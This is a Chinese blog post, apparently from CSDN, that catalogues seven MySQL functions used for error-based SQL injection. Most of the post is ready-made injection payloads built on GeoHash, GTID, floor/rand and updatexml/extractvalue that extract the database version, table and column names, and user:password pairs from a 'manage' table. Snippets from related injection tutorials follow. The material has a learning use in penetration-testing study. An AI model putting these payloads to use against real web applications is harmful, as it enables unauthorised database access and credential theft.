报错注入7大常用函数

于 2024-05-21 20:44:45 发布
阅读量972 收藏 18
点赞数 19
文章标签: 渗透测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64395221/article/details/139101792
版权

1.ST_LatFromGeoHash()(mysql>=5.7.x)

payload
and ST_LatFromGeoHash(concat(0x7e,(select user()),0x7e))--+

2.ST_LongFromGeoHash(mysql>=5.7.x)

payload
#同 8 ,都使用了嵌套查询

and ST_LongFromGeoHash(concat(0x7e,(select user()),0x7e))--+

3.GTID (MySQL >= 5.6.X - 显错<=200)

0x01 GTID

GTID是MySQL数据库每次提交事务后生成的一个全局事务标识符,GTID不仅在本服务器上是唯一的,其在复制拓扑中也是唯一的

GTID_SUBSET() 和 GTID_SUBTRACT()函数
0X02 函数详解

GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错

GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集) GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)

0x03 注入过程( payload )
GTID_SUBSET函数
​
') or gtid_subset(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e),1)--+
 
GTID_SUBTRACT
​
') or gtid_subtract(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e),1)--+

函数都是那样,只是适用的版本不同

4.floor(8.x>mysql>5.0)

count floor rand group by

统计 向下取整 生成随机数 分组

获取数据库版本信息
')or (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ ​ 

select count(*), concat(version(), floor(rand(0) * 2))x from information

获取当前数据库

')or (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

#获取表数据

')or (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='test' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

#获取users表里的段名

')or (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name = 'users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

5.ST_Pointfromgeohash (mysql>=5.7)

获取数据库版本信息
')or ST_PointFromGeoHash(version(),1)--+
获取表数据
')or ST_PointFromGeoHash((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)--+
获取users表里的段名
')or ST_PointFromGeoHash((select column_name from information_schema.columns where table_name = 'manage' limit 0,1),1)--+
获取字段里面的数据
')or ST_PointFromGeoHash((concat(0x23,(select group_concat(user,':',`password`) from manage),0x23)),1)--+

6 updatexml

updatexml(1,1,1) 一共可以接收三个参数,报错位置在第二个参数

7 extractvalue

extractvalue(1,1) 一共可以接收两个参数,报错位置在第二个参数
拾荒的狸猫
关注
  • 19
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入
qq_64332865的博客
02-18 574
基于注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的误提示回显出来。 注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库函数,对于一些SQL语句的误直接回显在页面上;(2)后台未对一些具有功能的函数进行过滤。 常用功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行注入时,floor()函数一般需要与rand()、count()、g
MySQL注入函数汇总
Au
06-12 5046
常用函数 字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空 concat(str1, str2, str3 ,...) concat_ws('指定分隔符', str1,str2,str3...) 开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体才返回空 group_concat...
注入七大常用函数
weixin_54217950的博客
02-15 5874
注入七大大常用函数 1.ST_LatFromGeoHash()(mysql>=5.7.x) and ST_LatFromGeoHash(concat(0x7e,(),0x7e))--+ 2.ST_LongFromGeoHash(mysql>=5.7.x) 同 8 ,都使用了嵌套查询 and ST_LongFromGeoHash(concat(0x7e,(),0x7e))--+ 3.GTID (MySQL >= 5.6.X - 显<=200) 0x01 GTID GTID是M
mysql floor注入_mysql注入总结
weixin_33134401的博客
01-26 194
最近又深刻的研究了一下mysql的注入,发现很多值得记录的东西,于是写了这篇博客做一个总结,目的是为了更深刻的理解注入注入原因及分类既然是研究注入,那我们先要弄明白为什么我们的注入语句会导致数据库,的原因我自己总结了一下,有以下几点重复数据,这里的重复主要有两个方面,其中之一是基于主键的唯一性:一个表主键必须是唯一的,如果一个表尝试生成两个相同的主键,就会爆出Dupli...
mysql注入函数,mysql注入
weixin_32175667的博客
03-18 331
1、注入攻击payload语法由于后台没有对数据库的信息做过滤,会输入到前台显示,那么我们可以利用制造函数(常用的几个函数updatexml(),extractvalue(),floor())进行渗透。注入流程:1、判断是否存在注入点2、构造误的语法制造3、使用提示信息输出内容。updatexml()函数:xml可扩展标记语言,update()更新函数updatexml(...
mysql注入_Mysql注入函数分析
weixin_35555531的博客
12-23 105
1.floor函数学习中遇见了 select count() from table group by floor(rand(0)2);这么条语句。秉持着不求甚解的态度,在此做个总结。首先,只要该语句明白了,那么类似select count(),(floor(rand(0)2))x from table group by x;这样的变形语句基本上都可以变通(这里只是起了个别名)。基本的查询 sele...
MYSQL updatexml()函数注入解析
09-09
主要介绍了MYSQL updatexml()函数注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
SQL注入 (updatexml与extractvalue函数介绍)-01
最新发布
09-15
今天,我们将讨论SQL注入的两种常用函数:updatexml和extractvalue函数。 updatexml函数 updatexml函数是MySQL中的一个XML函数,用于更新XML文档中的数据。其语法为: ``` UPDATEXML(XML_document, XPath_...
EXCEL常用函数.xlsx
10-23
主要适用于EXCEL入门者,快速了解EXCEL常用函数
MATLAB常用函数.pdf
07-13
MATLAB常用函数.pdfMATLAB常用函数.pdfMATLAB常用函数.pdfMATLAB常用函数.pdfMATLAB常用函数.pdfMATLAB常用函数.pdf
Mysql注入函数分析
Ms08067安全实验室
02-21 743
1.floor函数学习中遇见了 select count() from table group by floor(rand(0)2); 这么条语句。秉持着不求甚解的态度,在此做个总结。首...
MySQL之注入
yuan_boss的博客
08-23 2148
触发的方式有很多,具体细节也不尽相同。注意:通过concat()函数拼接的字符串长度只有31位,所以需要借助substr对结果进行截取,然后通过替换截取的下标来获取所有信息。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?cms靶场中具有sql注入的地址:http://localhost/cms/cms/show.php?​ 在注入点的判断过程中,发现数据库中SQL 语句的信息,会显示在页面中,因此可以利用信息进行注入
mysql注入函数_MySQL注入常用函数
weixin_42394780的博客
01-30 412
注入的分类仁者见仁,智者见智。基于从服务器接收到的响应▲基于误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于的 SQL 盲注基于如何处理输入的 SQL 查询(数据类型)•基于字符串•数字或整数为基础的基于程度和顺序的注入(哪里发生了影响)★一阶注射 指输入的注射语句对 WEB 直接产生了影响,出现了结果★二阶注射 类似存...
MYSQL 通过exp()注入
Ciyaso的博客
01-16 3638
代码解释 exp()数学函数,用于计算e的x次方的函数。 约束条件 5.5<mysql版本<5.6 原理 exp是以e为底的指数函数, 但是,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,。 将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。 我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。 从而实现了注入
mysql 注入原理及部分函数讲解
Keepb1ue的博客
05-17 3864
文章目录注入原理函数:updatexml()extractvalue()floor()MySQL版本函数利用(参考) 注入原理 注入的使用场景一般是在页面无法显示数据库的信息,但是是有内容的,我们就可以尝试利用手段误信息与子查询语句查询到的内容带出,当然,并不局限于这种场景,只要是有将mysql误输出,都可以尝试进行注入注入形式上一般是做两个嵌套的查询,里面的那个查询被称为子查询,执行顺序也是从子查询开始的,所以我们可以通过子查询查询我们想要的数据,然后在
mysql 3种模式注入
八月的专栏
04-16 3025
1、通过floor 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select
SQL注入注入函数
热门推荐
lightsec
03-15 1万+
前言 注入的前提是当语句发生误时,误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
注入常用函数总结
qq_43609884的博客
06-13 1893
sql注入
sql注入注入
m0_59855041的博客
06-12 1114
(4)group_concat():GROUP_CONCAT(xxx):是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其,并执行第二个参数语句。(与extractvalue()基本一样,这是updatexml(1,concat(),3)多了一个3的参数。substring(abc,2,2)为bc。
floor()函数用在注入的原理
05-24
而在利用注入获取数据时,我们通常会使用 floor() 函数。 floor() 函数是一个数学函数,用于向下取整,即将一个数值向下舍入到最接近它的小于等于该数值的整数。在注入中,我们可以构造一个带有误的 SQL ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值